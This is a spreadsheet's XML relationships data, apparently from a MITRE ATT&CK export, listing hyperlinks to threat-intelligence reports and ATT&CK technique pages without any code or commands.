Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Azure/Stormspotter" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/wmi-persistence" TargetMode="External"/><Relationship Id="rId2067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505" TargetMode="External"/><Relationship Id="rId2274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/revil-the-gandcrab-connection" TargetMode="External"/><Relationship Id="rId2481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746" TargetMode="External"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf" TargetMode="External"/><Relationship Id="rId898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" TargetMode="External"/><Relationship Id="rId1083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/instances" TargetMode="External"/><Relationship Id="rId1290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/libc.7.html" TargetMode="External"/><Relationship Id="rId2134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/" TargetMode="External"/><Relationship Id="rId2341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/" TargetMode="External"/><Relationship Id="rId2579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-converge" TargetMode="External"/><Relationship Id="rId2786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ta551-shathak-icedid/" TargetMode="External"/><Relationship Id="rId2993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" TargetMode="External"/><Relationship Id="rId758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/" TargetMode="External"/><Relationship Id="rId965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/" TargetMode="External"/><Relationship Id="rId1150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/" TargetMode="External"/><Relationship Id="rId1388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/" TargetMode="External"/><Relationship Id="rId1595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId2439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/shamoon-attacks" TargetMode="External"/><Relationship Id="rId2646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/" TargetMode="External"/><Relationship Id="rId2853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://offsec.almond.consulting/UAC-bypass-dotnet.html" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cyberint.com/qakbot-banking-trojan" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging" TargetMode="External"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" TargetMode="External"/><Relationship Id="rId1248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-penquin-turla-2/67962/" TargetMode="External"/><Relationship Id="rId1455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" TargetMode="External"/><Relationship Id="rId1662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx" TargetMode="External"/><Relationship Id="rId2201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/" TargetMode="External"/><Relationship Id="rId2506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/09/tinyturla.html" TargetMode="External"/><Relationship Id="rId1010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OmerYa/Invisi-Shell" TargetMode="External"/><Relationship Id="rId1108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" TargetMode="External"/><Relationship Id="rId1315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion" TargetMode="External"/><Relationship Id="rId1967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling" TargetMode="External"/><Relationship Id="rId2713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA13-175A" TargetMode="External"/><Relationship Id="rId2920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/" TargetMode="External"/><Relationship Id="rId1522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=483" TargetMode="External"/><Relationship Id="rId2089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/ROADtools" TargetMode="External"/><Relationship Id="rId2296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-259a" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/" TargetMode="External"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" TargetMode="External"/><Relationship Id="rId2156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration" TargetMode="External"/><Relationship Id="rId2363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353" TargetMode="External"/><Relationship Id="rId2570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e" TargetMode="External"/><Relationship Id="rId1172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thewover.github.io/Introducing-Donut/" TargetMode="External"/><Relationship Id="rId2016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" TargetMode="External"/><Relationship Id="rId2223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" TargetMode="External"/><Relationship Id="rId2430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99"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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/002" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/002" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/007" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1095" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/010" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052/001" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/003" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1615" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/005" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/004" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/002" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/002" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/002" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216/001" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/003" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/001" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1008" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/006" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/002" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/003" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/008" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1525" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/002" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/003" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/006" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205/002" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1115" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/001" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/001" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/014" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table3.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/004" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/005" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1531" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/001" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1106" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/001" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1197" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/004" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/001" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480/001" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/004" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/006" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/005" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/004" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/004" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/003" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/012" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/005" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1485" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/002" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/014" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1539" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/002" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1217" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/003" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/004" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/002" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/003" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/005" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/003" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/002" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/001" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/010" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/003" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1648" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1538" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/007" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/003" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/004" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/003" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/016" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1647" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/004" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/001" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/004" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/014" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1490" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1599/001" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/004" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1535" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003" TargetMode="External"/><Relationship 